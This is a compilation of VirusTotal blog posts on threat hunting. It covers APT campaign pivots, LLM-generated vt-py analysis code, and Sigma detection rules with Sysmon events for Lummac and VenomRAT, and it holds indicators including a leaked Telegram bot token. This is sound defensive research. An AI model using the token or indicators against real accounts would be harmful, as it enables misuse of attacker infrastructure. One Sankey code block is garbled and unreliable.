Leveraging VT corpus and using further pivots on the above metrics and many others included on the malicious spear-phishing email, we also tracked some further campaigns. Most importantly, we developed a new YARA rule and a new hypothesis every time to hunt for similar implants leveraging the Livehunt feature depending on the tailored specifications and the raw data we received during hunting keeping in mind the cases of false positives and false negatives.

Decoy document identified during our hunting activities

Submissions identified in the decoy document

The threat actor repeatedly used the same implant across multiple campaigns in Uzbekistan and Turkmenistan. Using hunting queries through VT along with submitter:UZ or submitter:TM helped us to identify these samples.

The most important pivot in our investigation was the malware sample itself as shown in the previous screenshots was the usage of encoded PowerShell blob spawning powershell.exe, which was used multiple times across different campaigns. This sample acted as a key indicator, allowing us to uncover other campaigns targeting critical sectors in the region, and confirmed the repetitive nature of the actor's operations.

Also, thanks to VT feature of collections, we further leveraged it to build an attribution of the threat entity.

Collections used during the attribution process

DragonClone

Finally, the last campaign that we wanted to illustrate how pivoting within the VT ecosystem enabled our team to uncover new samples was by a group we named DRAGONCLONE

The SEQRITE APT Team has been monitoring DRAGONCLONE as they actively target critical sectors across Asia and the globe. They utilize sophisticated methods for cyber-espionage, compromising strategic organizations in sectors like telecom and energy through the deployment of custom malware implants, the exploitation of unpatched vulnerabilities, and extensive spear-phishing.

Initial Discovery

Recently, on 13th May, our team discovered a malicious ZIP file that surfaced across various sources, including VT. The ZIP file was used as a preliminary infection vector and contained multiple EXE and DLL files inside the archive, like this one which contains the malicious payload.

Chinese-based threat actors have a well-known tendency to deliver DLL sideloading implants as part of their infection chains. Leveraging crowdsourced Sigma rules in VT, along with personal hunting techniques using static YARA signatures, we were able to track and hunt this malicious spear-phishing attachment effectively. In their public Sigma Rules list you can find different Sigma Rules that are created to identify DLL SideLoading.

Pivoting Certificates via VT Corpus

While exploring the network of related artifacts, we could not initially find any direct commonalities. However, a particular clean-looking executable named “2025 China Mobile Tietong Co., Ltd. Internal Training Program” raised our concern. Its naming and metadata suggested potential masquerading behavior, making it a critical pivot point that required deeper investigation.

Certificates are one of the most key indicators, while looking into malicious artefacts, we saw that it is a fresh and clean copy of WonderShare’s Repairit Software, a well known software for repairing corrupted files, whereas a suspicious concern is that it has been signed by ShenZhen Thunder NetWorking Technologies Ltd

VirusTotal query: signature:"ShenZhen Thunder Networking Technologies Ltd."

Using this hunch, we discovered and hunted for executables, which have been signed by similar and found there have been multiple malicious binaries, although, this has not been the only indicator or pivot, but a key one, to research for further ones.

Pivoting on Malware Configs via VT Corpus

We analyzed the loader and determined it's slightly advanced, performing complex tasks like anti-debugging. More significantly, it drops V-Shell, a post-exploitation toolkit. V-Shell was originally open-source but later taken down by its authors and has been observed in campaigns by Earth Lamia.

After extracting the V-Shell shellcode, we discovered an unusual malware configuration property: qwe123qwe. By leveraging the VT corpus to pivot on this finding, we were able to identify additional V-Shell implant samples potentially linked to this campaign.

VirusTotal query: malware_config:"qwe123qwe"

VT Tips (based on the success story)

[In the words of VirusTotal…]

Threat hunting is an art, and a good artist needs the right tools and techniques. In this section, we'll share some practical tips for pivoting and hunting within the VirusTotal ecosystem, inspired by the techniques used in the campaigns discussed in this blog post.

Hunt by Malware Configuration

Many malware families use configuration files to store C2 information, encryption keys, and other operational data. For some malware families, VirusTotal automatically extracts these configurations. You can use unique values from these configurations to find other samples from the same campaign.

For instance, in the DRAGONCLONE investigation, the V-Shell implant had an unusual malware configuration property: qwe123qwe. A simple query like malware_config:"qwe123qwe" in VT can reveal other samples using the same configuration. Similarly, the Cobalt Strike beacons used by UNG0002 had a unique public key in their configuration that could be used for pivoting. That's thanks to Backscatter. We've written blogs showing how to do advanced hunting using only the malware_config modifier. Remember that you can search for samples by family name like malware_config:"redline" up to Telegram tokens and even URLs configured in the malware configuration like malware_config:"https://steamcommunity.com/profiles/76561198780612393".

Don't Overlook LNK File Metadata

Threat actors often make operational security (OPSEC) mistakes. One common mistake is failing to remove metadata from files, including LNK (shortcut) files. This metadata can reveal information about the attacker's machine, such as the hostname.

In the UNG0002 campaign, the actor consistently used LNK files with the same metadata, specifically the machine identifier laptop-g5qalv96. We know that this information can be also modified by them to deceive security researchers, but often we observe good information that can be used to track them. This allowed the SEQRITE team to uncover a wider set of samples by querying VirusTotal for this metadata string.

Track Actors via Leaked Bot Tokens

Some malware, especially those using public platforms for command and control, will have hardcoded API tokens. As seen in the "Silent Lynx" campaign, a PowerShell script used a hardcoded Telegram bot token for C2 communication and data exfiltration.

These tokens can be extracted from memory dumps during sandbox execution or from the malware's code itself. Once you have a token, you may be able to track the threat actor's commands and even identify other victims, as was done in the Silent Lynx investigation. A concrete example of using Telegram bot tokens is the query malware_config:"bot7213845603:AAFFyxsyId9av6CCDVB1BCAM5hKLby41Dr8", which is associated with four infostealer samples uploaded between 2024 and 2025.

Leverage Code-Signing Certificates

Threat actors sometimes sign their malicious executables to make them appear legitimate. They may use stolen certificates or freshly created ones. These certificates can be a powerful pivot point.

In the DRAGONCLONE case, a suspicious executable was signed by "ShenZhen Thunder Networking Technologies Ltd.". By searching for other files signed with the same certificate (signature:"ShenZhen Thunder Networking Technologies Ltd."), you can uncover other tools in the attacker's arsenal.

Utilize YARA and Sigma Rules

For proactive hunting, you can develop your own YARA rules to find malware families based on unique strings, code patterns, or other characteristics. This was a key technique in the "Silent Lynx" campaign for hunting similar implants.

Additionally, you can leverage the power of the community by using crowdsourced Sigma rules in VirusTotal, even within your YARA rules. These rules can help you identify malicious behaviors, such as the DLL sideloading techniques used by DRAGONCLONE, directly from sandbox execution data.

For example, If you want to search for the Sigma rule "Potential DLL Sideloading Of MsCorSvc.DLL" in VT files, you can use the query sigma_rule:99b4e5347f2c92e8a7aeac6dc7a4175104a8ba3354e022684bd3780ea9224137 to do so. All the Sigma rules are updated from the public repo and can be consumed here.

Conclusion

The success stories of the SEQRITE APT-Team in tracking campaigns like UNG0002, Silent Lynx, and DRAGONCLONE demonstrate the power of VirusTotal as a collaborative and comprehensive threat intelligence platform. By leveraging a combination of malware configuration analysis, metadata pivoting, and community-driven tools like YARA and Sigma rules, security researchers can effectively uncover and track sophisticated threat actors.

These examples highlight that successful threat hunting is not just about having the right tools, but also about applying creative and persistent investigation techniques. The ability to pivot from one piece of evidence to another is crucial in connecting the dots and revealing the full scope of a campaign. The SEQRITE team has demonstrated a deep understanding of these pivoting techniques, and we appreciate that they have decided to share their valuable insights with the rest of the community.

We hope these tips and stories have been insightful and will help you in your own threat-hunting endeavors. The fight against cybercrime is a collective effort, and the more we share our knowledge and experiences, the stronger we become as a community.

Together, we can make the digital world a safer place.

VirusTotal Blog
Advanced Threat Hunting: Automating Large-Scale Operations with LLMs 30 September 2025 at 10:16

Advanced Threat Hunting: Automating Large-Scale Operations with LLMs

VirusTotal Blog

By: Joseliyo Sánchez

30 September 2025 at 10:16

Last week, we were fortunate enough to attend the fantastic LABScon conference, organized by the SentinelOne Labs team. While there, we presented a workshop titled 'Advanced Threat Hunting: Automating Large-Scale Operations with LLMs.' The main goal of this workshop was to show attendees how they could automate their research using the VirusTotal API and Gemini. Specifically, we demonstrated how to integrate the power of Google Colab to quickly and efficiently generate Jupyter notebooks using natural language.

It goes without saying that the use of LLMs is a must for every analyst today. For this reason, we also want to make life easier for everyone who uses the VirusTotal API for research.

The Power of the VirusTotal API and vt-py

The VirusTotal API is the programmatic gateway to our massive repository of threat intelligence data. While the VirusTotal GUI is great for agile querying, the API unlocks the ability to conduct large-scale, automated investigations and access raw data with more pivoting opportunities.

To make interacting with the API even easier, we recommend using the vt-py library. It simplifies much of the complexity of HTTP requests, JSON parsing, and rate limit management, making it the go-to choice for Python users.

From Natural Language to Actionable Intelligence with Gemini

To bridge the gap between human questions and API queries, we can leverage the integrated Gemini in Google Colab. We have created a "meta Colab" notebook that is pre-populated with working real code snippets for interacting with the VirusTotal API to retrieve different information such as campaigns, threat actors, malware, samples, URLs among others (which we will share soon). This provides Gemini with the necessary context to understand your natural language requests and generate accurate Python code to query the VirusTotal API. Gemini doesn't call the API directly; it creates the code snippet for you to execute.

For Gemini to generate accurate and relevant code, it needs context. Our meta Colab notebook is filled with examples that act as a guide. For complex questions, it will be nice to provide the exact field names that you want to work with. This context generally falls into two categories:

Reference Documentation: We include detailed documentation directly in the Colab. For example, we provide a comprehensive list of all available file search modifiers for the VirusTotal Intelligence search endpoint. This gives Gemini the "vocabulary" it needs to construct precise queries.
Working Code Examples: The notebook is pre-populated with dozens of working vt-py code snippets for common tasks like retrieving file information, performing an intelligence search, or getting relationships. This gives Gemini the "grammar" and correct patterns for interacting with our API.

Example of code snippet context that we have included in our meta colab:

query_results_with_behaviors = []
query = "have:sigma have:yara have:ids have:malware_config fs:1d+ have:bundled_file tag:overlay"
RELATIONS = "behaviours"

async for itemobj in cli.iterator('/intelligence/search',params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): '\*'},limit=0):
    query_results_with_behaviors.append(itemobj.to_dict())

res_with_behaviors = list(query_results_with_behaviors)

Diagram showing the flow from User's Action to Actionable Intelligence via Gemini and VirusTotal API

Practical Example: Hunting for Malicious LNK Files

One of the exercises in our workshop focused on analyzing malicious LNK files submitted to VirusTotal in a specific period of time to limit results. The goal was to discover common execution techniques and interesting command-line patterns.

Here’s how you could approach this with natural language queries in our meta Colab:

1. Retrieve all LNK file objects matching the criteria.

You can start by asking Gemini:

Create a code snippet to retrieve all LNK files submitted from January 1st, 2025, until April 1st, 2025, with 5 or more positives.

Code generated:

query_results = []

# Query for LNK files submitted between January 1st, 2025, and April 1st, 2025, with 5 or more positives.
query = "fs:2025-01-01+ fs:2025-04-01- p:5+ type:lnk"

async for itemobj in cli.iterator('/intelligence/search',params={'query': "%s"%(query)},limit=0):
    query_results.append(itemobj.to_dict())

lnk_files = list(query_results)
print(f"Found {len(lnk_files)} LNK files matching the criteria.")

2. Flatten the data and visualize it.

Next, you can ask Gemini to process the retrieved data and create visualizations:

Flatten the data in a dataframe and create a bar chart depicting the most common TargetFileDOSName values.

Code generated:

import pandas as pd
import plotly.express as px

# Extract the 'attributes' dictionary from each object in our results
attributes_list = [result.get('attributes', {}) for result in lnk_files]

# Use json_normalize to create a flat DataFrame
df_flat = pd.json_normalize(attributes_list)

# Check if 'exiftool.TargetFileDOSName' column exists and is not empty
if 'exiftool.TargetFileDOSName' in df_flat.columns and not df_flat['exiftool.TargetFileDOSName'].empty:
    # Count the occurrences of each TargetFileDOSName
    target_file_counts = df_flat['exiftool.TargetFileDOSName'].value_counts().reset_index()
    target_file_counts.columns = ['TargetFileDOSName', 'Count']

    # Get the top 10 most common TargetFileDOSName values for visualization
    top_target_files = target_file_counts.head(10)

    # Create an interactive bar chart
    fig = px.bar(top_target_files,
                 x='Count',
                 y='TargetFileDOSName',
                 orientation='h',
                 title='Top 10 Most Common TargetFileDOSName in LNK files',
                 labels={'Count': 'Number of Occurrences', 'TargetFileDOSName': 'Target File DOS Name'})
    fig.show()
else:
    print("The 'exiftool.TargetFileDOSName' column was not found or is empty in the flattened data.")

print("DataFrame shape:", df_flat.shape)
df_flat.head()

This will generate a code snippet using pandas and Plotly to give you a clear view of the most frequent target files in the malicious LNKs.

3. Visualize relationships with a Sankey diagram.

To dig deeper and understand the relationships between the infected machines and the malware, you can ask for a more advanced visualization:

Create a Sankey diagram connecting MachineID (source) to TargetFileDOSName (target), with link widths representing the number of occurrences. Include only MachineID values with 10 or more occurrences, grouping the rest as "Other", and make the visualization interactive with hover details.

Code generated:

import plotly.graph_objects as go
import pandas as pd

# Ensure df_flat is available from previous steps
# If not, you might need to re-run the cell that creates df_flat.

# Check if necessary columns exist in df_flat
if 'lnk_info.machine_id' in df_flat.columns and 'exiftool.TargetFileDOSName' in df_flat.columns:

    # Calculate the frequency of each machine ID and target file name pair
    pair_frequencies = df_flat.groupby(['lnk_info.machine_id', 'exiftool.TargetFileDOSName']).size().reset_index(name='frequency')

    # Identify MachineIDs with less than 10 occurrences
    machine_id_counts = pair_frequencies.groupby('lnk_info.machine_id')['frequency'].sum().reset_index(name='count')
    other_machine_ids = machine_id_counts[machine_id_counts['count']  {row['exiftool.TargetFileDOSName']}: {row['frequency']}", axis=1)
        )
    )])

    fig.update_layout(title_text="MachineID to TargetFileDOSName Sankey Diagram (Infrequent MachineIDs grouped as 'Other')", font_size=10)
    fig.show()
else:
    print("Required columns 'lnk_info.machine_id' or 'exiftool.TargetFileDOSName' not found in the DataFrame.")

This will create a powerful visualization that shows how different machines are being targeted with specific files, allowing us identify patterns for each machineID metadata.

4. Analyze the behavior of the LNK files.

Finally, you can investigate the behavior of the LNK files themselves, for example, by looking at how they are executed:

Create a pie chart depicting the distribution of window behaviors for LNK target processes (hidden, minimized,...).

Code generated:

import plotly.express as px
import pandas as pd

# Check if the relevant column exists
if 'lnk_info.header.show_window_str' in df_flat.columns and not df_flat['lnk_info.header.show_window_str'].empty:
    # Count the occurrences of each window behavior string
    window_behavior_counts = df_flat['lnk_info.header.show_window_str'].value_counts().reset_index()
    window_behavior_counts.columns = ['Window Behavior', 'Count']

    # Create an interactive pie chart
    fig = px.pie(window_behavior_counts,
                 names='Window Behavior',
                 values='Count',
                 title='Distribution of LNK Target Process Window Behaviors',
                 hover_data={'Count': True})
    fig.show()
else:
    print("The 'lnk_info.header.show_window_str' column was not found or is empty in the flattened data. Cannot create the pie chart.")

This allows you to quickly identify if the LNK files are trying to hide their execution, a common use case for malware.

5. Geographic Threat Mapping of Submissions

Understanding the geographical distribution of malware submissions can provide crucial insights into whether a campaign is widespread or targeting a specific region. By analyzing the submission metadata for our set of LNK files, an analyst can quickly identify potential hotspots, which could indicate a geographically focused attack. This is achieved by fetching the submissions relationship for each file, extracting the country of origin for each submission, and plotting this data on a world map (please note that submissions doesn’t mean targeted countries, but in some cases could be related).

Using the LNK files identified previously, create a code snippet that retrieves the submissions relationship for each file. Then, count the number of submissions from each country and display the results on a choropleth world map to visualize the submission hotspots.

In this case, Gemini uses the step-by-step execution, which basically is a set of consecutive executions. The code generated was:

Step 1

query_results_with_submissions = []

# Define the search query string for LNK files
query = "fs:2025-01-01+ fs:2025-04-01- p:5+ type:lnk"

# Define the relationship to request
RELATIONS = "submissions"

# Define the relationship attributes to retrieve (all attributes)
ATTRIBUTES_RELATIONS = "*"

# Use cli.iterator to perform an intelligence search with the specified query, relationships, and relationship attributes.
async for itemobj in cli.iterator('/intelligence/search', params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): ATTRIBUTES_RELATIONS}, limit=0):
    query_results_with_submissions.append(itemobj.to_dict())

# Convert query_results_with_submissions to a list called lnk_files_with_submissions
lnk_files_with_submissions = list(query_results_with_submissions)

# Print the number of LNK files found with submission data.
print(f"Found {len(lnk_files_with_submissions)} LNK files with submission data matching the criteria.")

Step 2

import pandas as pd

# Initialize an empty list to store submission countries
submission_countries = []

# Iterate through each item (LNK file) in the lnk_files_with_submissions list
for item in lnk_files_with_submissions:
    # Check if 'relationships' and 'submissions' exist and are not empty
    if 'relationships' in item and 'submissions' in item['relationships'] and item['relationships']['submissions']['data']:
        # Iterate through each submission object
        for submission in item['relationships']['submissions']['data']:
            # Extract the 'country' from 'submission['attributes']' and append it to the list
            if 'country' in submission['attributes']:
                submission_countries.append(submission['attributes']['country'])

# Convert the submission_countries list into a pandas Series
submission_countries_series = pd.Series(submission_countries)

# Count the occurrences of each country and store in a DataFrame
country_counts = submission_countries_series.value_counts().reset_index()
country_counts.columns = ['country', 'count']

print(f"Total unique countries found: {len(country_counts)}")
print("Top 5 submission countries:")
print(country_counts.head())

Step 3

!pip install pycountry
import plotly.express as px
import pandas as pd
import pycountry

# Function to get ISO-3 code from country name
def get_iso3(country_name):
    try:
        return pycountry.countries.search_fuzzy(country_name)[0].alpha_3
    except:
        return None

# Apply the function to get ISO-3 codes
country_counts['iso_alpha'] = country_counts['country'].apply(get_iso3)

# Create a world heatmap using Plotly Express with ISO-3 codes
fig = px.choropleth(country_counts.dropna(subset=['iso_alpha']), # Drop rows where ISO code couldn't be found
                      locations="iso_alpha", # Use ISO-3 codes for locations
                      locationmode='ISO-3',   # Specify ISO-3 location mode
                      color="count",
                      hover_name="country",
                      color_continuous_scale="Viridis",
                      title="Submission Country Heatmap")

# Update layout to increase figure size
fig.update_layout(
    autosize=False,
    width=1000, # Adjust width as needed
    height=600 # Adjust height as needed
)

fig.show()

More Examples

Here are some other examples of how you can use natural language to query the VirusTotal API:

Find malicious Chrome extensions (based on this blog):

This specific question is actually a really good example of how Google Colab will run the step-by-step process. As you can see, we asked different questions in the same prompt, for that reason Gemini will do it in different steps.

Retrieve all the samples from the /intelligence/search endpoint with the following query: fs:2025-08-01+ fs:2025-08-14- p:5+ tag:crx have:codeinsight.

Get the bundled_files and create a new dataframe with them too, but store only those having 5 or more malicious value.

Then identify the top 5 magika of those bundled files obtained

Code generated:

Step 1

query_results_with_bundled_files = []

# Define the search query string
query = "fs:2025-08-01+ fs:2025-08-14- p:5+ tag:crx have:codeinsight"

# Define the relationship to request
RELATIONS = "bundled_files"

# Define the relationship attributes to retrieve (all attributes)
ATTRIBUTES_RELATIONS = "*"

# Use cli.iterator to perform an intelligence search with the specified query, relationships, and relationship attributes.
async for itemobj in cli.iterator('/intelligence/search', params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): ATTRIBUTES_RELATIONS}, limit=0):
    query_results_with_bundled_files.append(itemobj.to_dict())

# Convert query_results_with_bundled_files to a list called crx_files_with_bundled_files
crx_files_with_bundled_files = list(query_results_with_bundled_files)

# Print the number of found CRX files with bundled file data.
print(f"Found {len(crx_files_with_bundled_files)} CRX files with bundled file data matching the criteria.")

Step 2

import pandas as pd

# List to store all bundled file attributes
all_bundled_files_data = []

# Iterate through each CRX file with bundled file data
for crx_file in crx_files_with_bundled_files:
    if 'relationships' in crx_file and 'bundled_files' in crx_file['relationships']:
        for bundled_file in crx_file['relationships']['bundled_files']['data']:
            all_bundled_files_data.append(bundled_file.get('attributes', {}))

# Create a DataFrame from the extracted bundled file attributes
df_bundled_files = pd.json_normalize(all_bundled_files_data)

# Filter for bundled files with 5 or more malicious detections
df_malicious_bundled_files = df_bundled_files[df_bundled_files['last_analysis_stats.malicious'] >= 5]

print(f"Total bundled files extracted: {len(df_bundled_files)}")
print(f"Bundled files with 5 or more malicious detections: {len(df_malicious_bundled_files)}")

df_malicious_bundled_files.head()

Step 3

import pandas as pd
import plotly.express as px

# Check if the 'magika' column exists and is not empty in the filtered DataFrame
if 'magika' in df_malicious_bundled_files.columns and not df_malicious_bundled_files['magika'].empty:
    # Count the occurrences of each magika type
    magika_counts = df_malicious_bundled_files['magika'].value_counts().reset_index()
    magika_counts.columns = ['Magika Type', 'Count']

    # Get the top 5 most frequent magika types
    top_5_magika = magika_counts.head(5)

    print("Top 5 Magika Types in malicious bundled files:")
    print(top_5_magika)

    # Visualize the top 5 magika types
    fig = px.bar(top_5_magika,
                 x='Count',
                 y='Magika Type',
                 orientation='h',
                 title='Top 5 Magika Types in Malicious Bundled Files',
                 labels={'Count': 'Number of Occurrences', 'Magika Type': 'Magika Type'}) 
    fig.update_layout(yaxis={'categoryorder':'total ascending'}) # Order bars by count
    fig.show()
else:
    print("The 'magika' column was not found or is empty in the filtered malicious bundled files DataFrame. Cannot identify top magika types.")

Retrieve threat actors:

Retrieve threat actors targeting the United Kingdom with an espionage motivation. Sort the results in descending order of relevance. Display the total number of threat actors and their names.

Investigate campaigns:

Retrieve information about threat actors and malware involved in campaigns targeting Pakistan. For each threat actor, retrieve its country of origin, motivations, and targeted industries. For each malware, retrieve its name.

What’s next

This workshop, co-authored with Aleksandar from Sentinel LABS, will be presented at future conferences to show the community how to get the most out of the VirusTotal API. We'll be updating the content of our meta colab regularly and will share more information soon about how to get the Google Colab.

In the meantime, if you have any feedback or ideas to contribute, we are open to suggestions.

VirusTotal Blog
Supercharging Your Threat Hunts: Join VirusTotal at Labscon for a Workshop on Automation and LLMs 5 September 2025 at 11:53

Supercharging Your Threat Hunts: Join VirusTotal at Labscon for a Workshop on Automation and LLMs

VirusTotal Blog

By: Joseliyo Sánchez

5 September 2025 at 11:53

We are excited to announce that our colleague Joseliyo Sánchez, will be at Labscon to present our workshop: Advanced Threat Hunting: Automating Large-Scale Operations with LLMs. This workshop is a joint effort with SentinelOne and their researcher, Aleksandar Milenkoski.

In today's rapidly evolving threat landscape, security professionals face an overwhelming tide of data and increasingly sophisticated adversaries. This hands-on workshop is designed to empower you to move beyond the traditional web interface and harness the full potential of the VirusTotal Enterprise API for large-scale, automated threat intelligence and hunting.

We will dive deep into how you can use the VirusTotal Enterprise API with Python and Google Colab notebooks to automate the consumption of massive datasets. You'll learn how to track the behaviors of advanced persistent threat (APT) actors and cybercrime groups through practical, real-time exercises.

A key part of our workshop will focus on leveraging Large Language Models (LLMs) to supercharge your analysis. We'll show how you can use AI to help understand complex data, build better queries, and create insightful visualizations to enrich your information for a deeper understanding of threats.

This session is ideal for cyber threat intelligence analysts, threat hunters, incident responders, SOC analysts, and security researchers looking to automate and scale up their threat hunting workflows.

After the workshop, we will publish a follow-up blog post that will delve deeper into some of the exercises and examples presented, providing a valuable resource for further learning and implementation.

We look forward to seeing you at Labscon!

(All of the scenarios are compatible with Google Threat Intelligence)

----

Conference website: https://www.labscon.io/

Date: September 17-20, 2025

Registration: Invite-Only

Place: Scottsdale, Arizona

Duration: 3-5h

VirusTotal Blog
Research that builds detections 9 January 2025 at 09:51

Research that builds detections

VirusTotal Blog

By: Joseliyo Sánchez

9 January 2025 at 09:51

Note: You can view the full content of the blog here.

Introduction

Detection engineering is becoming increasingly important in surfacing new malicious activity. Threat actors might take advantage of previously unknown malware families - but a successful detection of certain methodologies or artifacts can help expose the entire infection chain.

In previous blog posts, we announced the integration of Sigma rules for macOS and Linux into VirusTotal, as well as ways in which Sigma rules can be converted to YARA to take advantage of VirusTotal Livehunt capabilities. In this post, we will show different approaches to hunt for interesting samples and derive new Sigma detection opportunities based on their behavior.

Tell me what role you have and I'll tell you how you use VirusTotal

VirusTotal is a really useful tool that can be used in many different ways. We have seen how people from SOCs and Incident Response teams use it (in fact, we have our VirusTotal Academy videos for SOCs and IRs teams), and we have also shown how those who hunt for threats or analyze those threats can use it too.

But there's another really cool way to use VirusTotal - for people who build detections and those who are doing research. We want to show everyone how we use VirusTotal in our work. Hopefully, this will be helpful and also give people ideas for new ways to use it themselves.

To explain our process, we used examples of Lummac and VenomRAT samples that we found in recent campaigns. These caught our attention due to some behaviors that had not been identified by public detection rules in the community. For that reason we have created two Sigma rules to share with the community, but if you want to get all the details about how we identified it and started our research, go to our Google Threat Intelligence community blog.

Our approach

As detection engineers, it is important to look for techniques that can be in use by multiple threat actors - as this makes tracking malicious activity more efficient. Prior to creating those detections, it is best to check existing research and rule collections, such as the Sigma rules repository. This can save time and effort, as well as provide insight into previously observed samples that can be further researched.

A different approach would be to instead look for malicious files that are not detected by existing Sigma rules, since they can uncover novel methodologies and provide new opportunities for detection creation.

One approach is to hunt for files that are flagged by at least five different AV vendors, were recently uploaded within the last month, have sandbox execution (in order to view their behavior), and which have not triggered any Crowdsourced Sigma rules.

p:5+ have:behavior fs:30d+ not have:sigma

This initial query can be adapted to incorporate additional filters that the researcher may find relevant. These could include modifiers to identify for example, the presence of the PowerShell process in the list of executed processes (behavior_created_processes:powershell.exe), filtering results to only include documents (type:document), or identifying communication with services like Pastebin (behavior_network:pastebin.com).

Another way to go is to look at files that have been flagged by at least five AV’s and were tested in either Zenbox or CAPE. These sandboxes often have great logs produced by Sysmon, which are really useful for figuring out how to spot these threats. Again, we'd want to focus on files uploaded in the last month that haven't triggered any Sigma rules. This gives us a good starting point for building new detection rules.

p:5+ (sandbox_name:"CAPE Sandbox" or sandbox_name:"Zenbox") fs:30d+ not have:sigma

Lastly, another idea is to look for files that have not triggered many high severity detections from the Sigma Crowdsourced rules, as these can be more evasive. Specifically, we will look for samples with zero critical, high or medium alerts - and no more than two low severity ones.

p:5+ have:behavior fs:30d+ sigma_critical:0 sigma_high:0 sigma_medium:0 sigma_low:2-

With these queries, we can start investigating some samples that may be interesting to create detection rules.

Our detections for the community

Our approach helps us identify behaviors that seem interesting and worth focusing on. In our blog, where we explain this approach in detail, we highlighted two campaigns linked to Lummac and VenomRAT that exhibited interesting activity. Because of this, we decided to share the Sigma rules we developed for these campaigns. Both rules have been published in Sigma's official repository for the community.

Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer

Sigma rule on GitHub: https://github.com/SigmaHQ/sigma/blob/master/rules-emerging-threats/2024/Malware/Lummac-Stealer/proc_creation_win_malware_lummac_more_vbc.yml

title: Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer
  id: 19b3806e-46f2-4b4c-9337-e3d8653245ea
  status: experimental
  description: Detects the execution of more.com and vbc.exe in the process tree. This behaviors was observed by a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process.
  references:
      - https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef
      - https://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html
      - https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html
  author: Joseliyo Sanchez, @Joseliyo_Jstnk
  date: 2024-11-14
  tags:
      - attack.defense-evasion
      - attack.t1055
  logsource:
      category: process_creation
      product: windows
  detection:
      # VT Query: behaviour_processes:"C:\\Windows\\SysWOW64\\more.com" behaviour_processes:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe"
      selection_parent:
          ParentImage|endswith: '\more.com'
      selection_child:
          - Image|endswith: '\vbc.exe'
          - OriginalFileName: 'vbc.exe'
      condition: all of selection_*
  falsepositives:
      - Unknown
  level: high

Sysmon event for: Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer

{
  "System": {
    "Provider": {
      "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
      "Name": "Microsoft-Windows-Sysmon"
    },
    "EventID": 1,
    "Version": 5,
    "Level": 4,
    "Task": 1,
    "Opcode": 0,
    "Keywords": "0x8000000000000000",
    "TimeCreated": {
      "SystemTime": "2024-11-26T16:23:05.132539500Z"
    },
    "EventRecordID": 692861,
    "Correlation": {},
    "Execution": {
      "ProcessID": 2396,
      "ThreadID": 3116
    },
    "Channel": "Microsoft-Windows-Sysmon/Operational",
    "Computer": "DESKTOP-B0T93D6",
    "Security": {
      "UserID": "S-1-5-18"
    }
  },
  "EventData": {
    "RuleName": "-",
    "UtcTime": "2024-11-26 16:23:05.064",
    "ProcessGuid": "{C784477D-F5E9-6745-6006-000000003F00}",
    "ProcessId": 4184,
    "Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe",
    "FileVersion": "14.8.3761.0",
    "Description": "Visual Basic Command Line Compiler",
    "Product": "Microsoft® .NET Framework",
    "Company": "Microsoft Corporation",
    "OriginalFileName": "vbc.exe",
    "CommandLine": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe",
    "CurrentDirectory": "C:\\Users\\george\\AppData\\Roaming\\comlocal\\RUYCLAXYVMFJ\\",
    "User": "DESKTOP-B0T93D6\\george",
    "LogonGuid": "{C784477D-9D9B-66FF-6E87-050000000000}",
    "LogonId": "0x5876e",
    "TerminalSessionId": 1,
    "IntegrityLevel": "High",
    "Hashes": {
      "SHA1": "61F4D9A9EE38DBC72E840B3624520CF31A3A8653",
      "MD5": "FCCB961AE76D9E600A558D2D0225ED43",
      "SHA256": "466876F453563A272ADB5D568670ECA98D805E7ECAA5A2E18C92B6D3C947DF93",
      "IMPHASH": "1460E2E6D7F8ECA4240B7C78FA619D15"
    },
    "ParentProcessGuid": "{C784477D-F5D4-6745-5E06-000000003F00}",
    "ParentProcessId": 6572,
    "ParentImage": "C:\\Windows\\SysWOW64\\more.com",
    "ParentCommandLine": "C:\\Windows\\SysWOW64\\more.com",
    "ParentUser": "DESKTOP-B0T93D6\\george"
  }
}

File Creation Related To RAT Clients

Sigma rule on GitHub: https://github.com/SigmaHQ/sigma/blob/fad4742996c55d8d4663e611f84877a2b741dc46/rules-emerging-threats/2024/Malware/Generic/file_event_win_malware_generic_creation_configuration_rats.yml

title: File Creation Related To RAT Clients
  id: 2f3039c8-e8fe-43a9-b5cf-dcd424a2522d
  status: experimental
  description: File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
  references:
      - https://www.virustotal.com/gui/file/c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
      - https://www.virustotal.com/gui/file/e96a0c1bc5f720d7f0a53f72e5bb424163c943c24a437b1065957a79f5872675
  author: Joseliyo Sanchez, @Joseliyo_Jstnk
  date: 2024-11-15
  tags:
      - attack.execution
  logsource:
      category: file_event
      product: windows
  detection:
      # VT Query: behaviour_files:"\\AppData\\Roaming\\DataLogs\\DataLogs.conf"
      # VT Query: behaviour_files:"DataLogs.conf" or behaviour_files:"hvnc.conf" or behaviour_files:"dcrat.conf"
      selection_required:
          TargetFilename|contains: '\AppData\Roaming\'
      selection_variants:
          TargetFilename|endswith:
              - '\datalogs.conf'
              - '\hvnc.conf'
              - '\dcrat.conf'
          TargetFilename|contains:
              - '\mydata\'
              - '\datalogs\'
              - '\hvnc\'
              - '\dcrat\'
      condition: all of selection_*
  falsepositives:
      - Legitimate software creating a file with the same name
  level: high

Sysmon event for: File Creation Related To RAT Clients

{
  "System": {
    "Provider": {
      "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
      "Name": "Microsoft-Windows-Sysmon"
    },
    "EventID": 11,
    "Version": 2,
    "Level": 4,
    "Task": 11,
    "Opcode": 0,
    "Keywords": "0x8000000000000000",
    "TimeCreated": {
